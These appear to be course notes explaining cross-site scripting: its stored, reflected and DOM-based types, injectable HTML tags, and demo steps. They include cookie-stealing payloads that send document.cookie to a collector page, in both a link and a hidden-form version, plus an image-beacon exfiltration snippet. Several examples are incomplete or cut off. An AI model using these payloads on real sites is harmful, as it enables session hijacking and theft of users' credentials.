Cross-Site Scripting (XSS)

What Is XSS?

  • Cross-site scripting (XSS) is a type of web application vulnerability that
    • enables the attackers to inject client-side script into web pages viewed by other users, and
    • upon the injected scripted is executed, to bypass the same origin policy.
      (Note: The same-origin policy cannot stop you from sending a request.)
  • XSS exploits web applications (e.g., blog, messageboard, etc.) with dynamic content that is produced from user inputs not validated or encoded
  • By injecting malicious code, XSS attacks turn the web applications from the data context into code context.
  • XSS isn't a direct attack against the Web application but rather an attack on the Web applications users.
  • If an attacker can place script anywhere in a vulnerable web application, the browser will believe that the script came from the vulnerable web application rather than the attacker. Thus, the injected script will run in the domain of the vulnerable web application and be able to do the following: 
    • Have access to read cookies used in that vulnerable web application
    • Be able to see the content of pages served by the vulnerable web application and send it to the attacker 
    • Change the way the vulnerable web application looks
    • Make calls back to the server who hosts the vulnerable web application
  • What to steal: session cookies, basic authorization credentials, source IP addresses, SSL certificates, Windows domain credentials, etc.
  • There are three known types of XSS:
    • Stored (server-side):
      • Malicious script is stored in a server resource such as a database.
      • By visiting the website, the script is executed.
    • Reflected (server-side):
      • Malicious script is transmitted to the victim via an email or similar mechanism.
      • By clicking on the link, the script is executed.
    • DOM-based (client-side): Attacks that modify the victims DOM directly and don't require data in the HTTP response.
  • Example incidents: Paypal, Youtube.

DOM Exploited through JavaSrcipt 

  • Get/alter page contentdocument.getElementById('myAnchor').innerHTML
  • Get querystring:
  • Get cookies: document.cookie
  • Read location: document.location
  • Read/Write location: window.location.href
  • Extend page content:

HTML Exploited through XSS 

  • <a> tag: <a onclick="javascript" (requires a click)
  • <div> tag: <div style=background:url(javascript)>
  • <form> tag: <form action="logon.aspx" method="post" onsubmit="javascript"></form>
  • <iframe> tag: <iframe src="javascript">
  • <object>: <object><param name="src" value="javascript"> </param></object>
  • <img> tag: <img src="javascript"> (1x1 px to be invisible or use Javascript to create an image object)
         var image1 = new Image();
         image1.src = "http://host/?command";
  • <script> tag: <script src="javascript">
  • <embed> tag: <embed src="javascript">

URL-Shortening Service

URL-shortening service like, TinyURL, or can provide a really helpful service for social network users, but its also a really useful service for XSS attackers to disguise the poisoned links.  For example, a long URL such as can be shorten to a redirect.

Reflected (First-Order) XSS 

  • A reflected HTML injection attack a web application which accepts user input in an HTTP request and responds with the identical user input within the body of the HTTP response.  
  • This type of XSS is "reflected" because it involves crafting a request containing embedded JavaScript which is reflected back to any user who makes the request. 
  • The attack payload is delivered and executed via a single request and response. For this reason, it is also sometimes referred to as first-order XSS.
  • Create the following link to send a victim's cookies to the hacker's website Demo 1:
    <a href="#" onclick="document.location='http://localhost/XSSHackCookies/SaveHackedCookies.aspx?cookiesvalues=' +escape(document.cookie);" target=_blank>Click me</a>

    Aspect Security RXSS
    (source: Aspect Security)

Stored (Persistent) XSS

  • The XSS script is posted in web applications such as online message board, blog, and so on, and then "stored" by the server in the database permanently.
  • Since the XSS script is rendered automatically, individual victims are randomly targeted.
  • In social networking sites, the script would be further designed to self-propagate across accounts, creating a type of a client-side worm.
  • Steps in XSS attack Demo 2:

    1. Search a targeted web site simply places the user input back into the response. 
    2. Testing the page to see if it is possible to inject HTML and Javascript into the web page.
    3. Post injected scripts (GET)
      <a href="#" onclick="document.location='http://localhost/XSSHackCookies/SaveHackedCookies.aspx?cookiesvalues=' +escape(document.cookie);" target=_blank>Click me</a>
      HTML encoded:
      &lt;a href=&quot;#&quot; onclick=&quot;document.location=&#39;http://localhost/XSSHackCookies/SaveHackedCookies.aspx?cookiesvalues=&#39; +escape(document.cookie);&quot; target=_blank&gt;Click me&lt;/a&gt;
    4. Post injected scripts (POST)
      <form name='hackerform' method='POST' action='http://localhost/XSSHackCookies/savehackedcookies.aspx'>
         document.write('<input type=hidden name=cookiesvalues value=');    
      HTML encoded:
      &lt;form name=&#39;hackerform&#39; method=&#39;POST&#39; action=&#39;http://localhost/XSSHackCookies/savehackedcookies.aspx&#39;&gt;
         document.write(&#39;&lt;input type=hidden name=cookiesvalues value=&#39;);    

DOM-based XSS

  • Also called DOMXSS, local XSS or Type-0 XSS.
  • The attack payload is executed as a result of modifying the HTML Document Object Model (DOM) in the victim's browser used by the original client-side script of the page.
  • The DOM provides a structural representation of the HTML and XML document and enable the document's content and visual presentation to be modified by using a scripting language such as JavaScript.
  • The original DOMXSS paper by Amit Klein in 2005.
  • Webpage defacement: an attack on a website that changes the visual appearance on a webpage via DOM modification.
    • Payload: document.images[0].src
    • Webpage defacement is different from website defacement which is using the web server as the attack path.
  • Demo 3

Website Defacement

  • An attack on a website that changes the visual appearance of the site or a webpage. 
  • The attack is typically the work of system crackers, who break into a web server and replace the hosted website with their own.
  • The most common attack path is using SQL injections to gain administrative access to replace webpages.